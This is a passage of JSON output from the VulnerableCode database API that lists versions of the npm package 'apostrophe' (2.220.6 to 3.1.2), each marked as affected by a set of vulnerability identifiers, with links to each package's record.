-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.6"},{"url":"http://public2.vulnerablecode.io/api/packages/539483?format=json","purl":"pkg:npm/apostrophe@2.220.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.7"},{"url":"http://public2.vulnerablecode.io/api/packages/988896?format=json","purl":"pkg:npm/apostrophe@2.220.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.9"},{"url":"http://public2.vulnerablecode.io/api/packages/988897?format=json","purl":"pkg:npm/apostrophe@2.221.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.221.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988898?format=json","purl":"pkg:npm/apostrophe@2.221.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.221.2"},{"url":"http://public2.vulnerablecode.io/api/packages/988899?format=json","purl":"pkg:npm/apostrophe@2.222.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.222.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988900?format=json","purl":"pkg:npm/apostrophe@2.223.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.223.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988901?format=json","purl":"pkg:npm/apostrophe@2.223.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.223.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988902?format=json","purl":"pkg:npm/apostrophe@2.224.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.224.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988903?format=json","purl":"pkg:npm/apostrophe@2.225.0-alpha","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.225.0-alpha"},{"url":"http://public2.vulnerablecode.io/api/packages/988904?format=json","purl":"pkg:npm/apostrophe@2.225.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.225.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988905?format=json","purl":"pkg:npm/apostrophe@2.226.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.226.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988906?format=json","purl":"pkg:npm/apostrophe@2.227.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988907?format=json","purl":"pkg:npm/apostrophe@2.227.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988908?format=json","purl":"pkg:npm/apostrophe@2.227.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.2"},{"url":"http://public2.vulnerablecode.io/api/packages/988909?format=json","purl":"pkg:npm/apostrophe@2.227.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.3"},{"url":"http://public2.vulnerablecode.io/api/packages/988910?format=json","purl":"pkg:npm/apostrophe@2.227.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.4"},{"url":"http://public2.vulnerablecode.io/api/packages/988911?format=json","purl":"pkg:npm/apostrophe@2.227.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.5"},{"url":"http://public2.vulnerablecode.io/api/packages/988912?format=json","purl":"pkg:npm/apostrophe@2.227.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.6"},{"url":"http://public2.vulnerablecode.io/api/packages/988913?format=json","purl":"pkg:npm/apostrophe@2.227.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.7"},{"url":"http://public2.vulnerablecode.io/api/packages/988914?format=json","purl":"pkg:npm/apostrophe@2.227.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.8"},{"url":"http://public2.vulnerablecode.io/api/packages/988915?format=json","purl":"pkg:npm/apostrophe@2.227.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.9"},{"url":"http://public2.vulnerablecode.io/api/packages/988916?format=json","purl":"pkg:npm/apostrophe@2.227.10-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.10-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988917?format=json","purl":"pkg:npm/apostrophe@2.227.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.10"},{"url":"http://public2.vulnerablecode.io/api/packages/988918?format=json","purl":"pkg:npm/apostrophe@2.227.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.11"},{"url":"http://public2.vulnerablecode.io/api/packages/988919?format=json","purl":"pkg:npm/apostrophe@2.227.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.227.12"},{"url":"http://public2.vulnerablecode.io/api/packages/539484?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539485?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539486?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.3"},{"url":"http://public2.vulnerablecode.io/api/packages/539487?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.4"},{"url":"http://public2.vulnerablecode.io/api/packages/539488?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.4.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539489?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.4.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539490?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.5"},{"url":"http://public2.vulnerablecode.io/api/packages/539491?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.6"},{"url":"http://public2.vulnerablecode.io/api/packages/539492?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.6.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.6.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539493?format=json","purl":"pkg:npm/apostrophe@3.0.0-alpha.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-alpha.7"},{"url":"http://public2.vulnerablecode.io/api/packages/539494?format=json","purl":"pkg:npm/apostrophe@3.0.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539495?format=json","purl":"pkg:npm/apostrophe@3.0.0-beta.1.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-beta.1.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539496?format=json","purl":"pkg:npm/apostrophe@3.0.0-beta.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-beta.1.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539497?format=json","purl":"pkg:npm/apostrophe@3.0.0-beta.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-beta.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539498?format=json","purl":"pkg:npm/apostrophe@3.0.0-beta.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-beta.3"},{"url":"http://public2.vulnerablecode.io/api/packages/539499?format=json","purl":"pkg:npm/apostrophe@3.0.0-beta.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0-beta.3.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539500?format=json","purl":"pkg:npm/apostrophe@3.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539501?format=json","purl":"pkg:npm/apostrophe@3.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.0.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539502?format=json","purl":"pkg:npm/apostrophe@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.1.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539503?format=json","purl":"pkg:npm/apostrophe@3.1.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.1.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539504?format=json","purl":"pkg:npm/apostrophe@3.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.1.2"},{"url":"http://public2.vulnerablecode.io/api/packages/